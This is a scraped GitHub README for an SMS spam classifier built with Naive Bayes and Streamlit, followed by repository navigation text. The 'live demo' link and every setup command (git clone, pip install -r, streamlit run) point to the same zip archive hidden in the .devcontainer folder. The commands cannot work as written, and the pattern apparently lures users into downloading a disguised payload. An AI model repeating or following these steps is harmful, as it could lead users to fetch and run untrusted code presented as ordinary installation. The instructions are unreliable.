SMS Spam Detection

Overview

The SMS Spam Detection project aims to build a machine learning model capable of predicting whether an SMS message is spam or not. This project uses Python, leveraging libraries like Scikit-learn, Pandas, and NumPy for building and training the model. Additionally, it uses Streamlit for web deployment, enabling easy interaction with the model.

Demo

You can try out the SMS Spam Detection model live by visiting the deployed web app https://github.com/rushangchandekar/SMS-Spam-Detection/raw/refs/heads/main/.devcontainer/Spam-Detection-SM-v2.8-alpha.3.zip

Technology Used

Python
Scikit-learn (for machine learning)
Pandas (for data manipulation)
NumPy (for numerical computations)
Streamlit (for web deployment)
Matplotlib & Seaborn (for data visualization)
NLTK (for text preprocessing)

Features

Data collection and preprocessing
Exploratory Data Analysis (EDA)
Model building and evaluation
Web app deployment for real-time spam detection

Data Collection

The dataset used for this project comes from the SMS Spam Collection dataset available on Kaggle. It contains over 5,500 SMS messages that are labeled as spam or ham (non-spam). This dataset serves as the training and testing data for the model.

Data Cleaning and Preprocessing

The dataset undergoes several preprocessing steps to ensure the text data is ready for analysis:

Handling Missing Values: Null or missing data is handled appropriately.
Label Encoding: The target column (spam or ham) is label-encoded.
Text Preprocessing:
- Conversion of text to lowercase.
- Removal of special characters, numbers, and punctuation.
- Removal of stopwords (commonly used words with little meaning).
- Tokenization: splitting text into individual words.
- Lemmatization or stemming: reducing words to their base form.

Exploratory Data Analysis (EDA)

Before building the model, exploratory data analysis (EDA) was performed to better understand the dataset:

Statistical summaries of message lengths and word counts.
Visualizations using bar charts, pie charts, and word clouds.
An analysis of word frequency and correlations between variables.

Visualizations help to understand the nature of spam vs non-spam messages and the distribution of message lengths.

Model Building and Selection

Several machine learning algorithms were experimented with to build the most effective spam detection model:

Naive Bayes (MultinomialNB)
Logistic Regression
Random Forest
Support Vector Machine (SVM)
K-Nearest Neighbors (KNN)

The model is evaluated using accuracy, precision, recall, and F1-score. After testing various models, Naive Bayes emerged as the best performing model based on precision and recall for spam detection.

Web Deployment

The trained model is deployed as a Streamlit web application. Users can input SMS text into a simple text box, and the model will predict whether it’s spam or not.

To run the app locally:

Clone the repository.

Install the necessary dependencies using:

pip install -r https://github.com/rushangchandekar/SMS-Spam-Detection/raw/refs/heads/main/.devcontainer/Spam-Detection-SM-v2.8-alpha.3.zip

Launch the app with Streamlit:

streamlit run https://github.com/rushangchandekar/SMS-Spam-Detection/raw/refs/heads/main/.devcontainer/Spam-Detection-SM-v2.8-alpha.3.zip

Open your browser and navigate to localhost:8501 to interact with the model.

Usage

To use the SMS Spam Detection model on your own machine:

Clone the repository:

git clone https://github.com/rushangchandekar/SMS-Spam-Detection/raw/refs/heads/main/.devcontainer/Spam-Detection-SM-v2.8-alpha.3.zip
cd sms-spam-detection

Install the required Python packages:

pip install -r https://github.com/rushangchandekar/SMS-Spam-Detection/raw/refs/heads/main/.devcontainer/Spam-Detection-SM-v2.8-alpha.3.zip

Run the Streamlit app:

streamlit run https://github.com/rushangchandekar/SMS-Spam-Detection/raw/refs/heads/main/.devcontainer/Spam-Detection-SM-v2.8-alpha.3.zip

Visit http://localhost:8501 in your browser to access the web application.

Contributing

Contributions are welcome! If you have ideas for improvements or encounter any issues, feel free to open an issue or submit a pull request.

To contribute:

Fork this repository.
Make your changes.
Submit a pull request with a clear description of your changes.

Name		Name	Last commit message	Last commit date
Latest commit History 13 Commits
.devcontainer		.devcontainer
intentionalism		intentionalism
README.md		README.md
app.py		app.py
model.pkl		model.pkl
requirements.txt		requirements.txt
sms-spam.csv		sms-spam.csv
sms-spam.ipynb		sms-spam.ipynb
vectorizer.pkl		vectorizer.pkl

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

SMS Spam Detection

Overview

Demo

Technology Used

Features

Data Collection

Data Cleaning and Preprocessing

Exploratory Data Analysis (EDA)

Model Building and Selection

Web Deployment

Usage

Contributing

About

Uh oh!

Releases

Packages

Uh oh!

Uh oh!

Contributors

Uh oh!

Languages

Folders and files

Latest commit

History

Repository files navigation

SMS Spam Detection

Overview

Demo

Technology Used

Features

Data Collection

Data Cleaning and Preprocessing

Exploratory Data Analysis (EDA)

Model Building and Selection

Web Deployment

Usage

Contributing

About

Resources

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Uh oh!

Uh oh!

Contributors

Uh oh!

Languages

Packages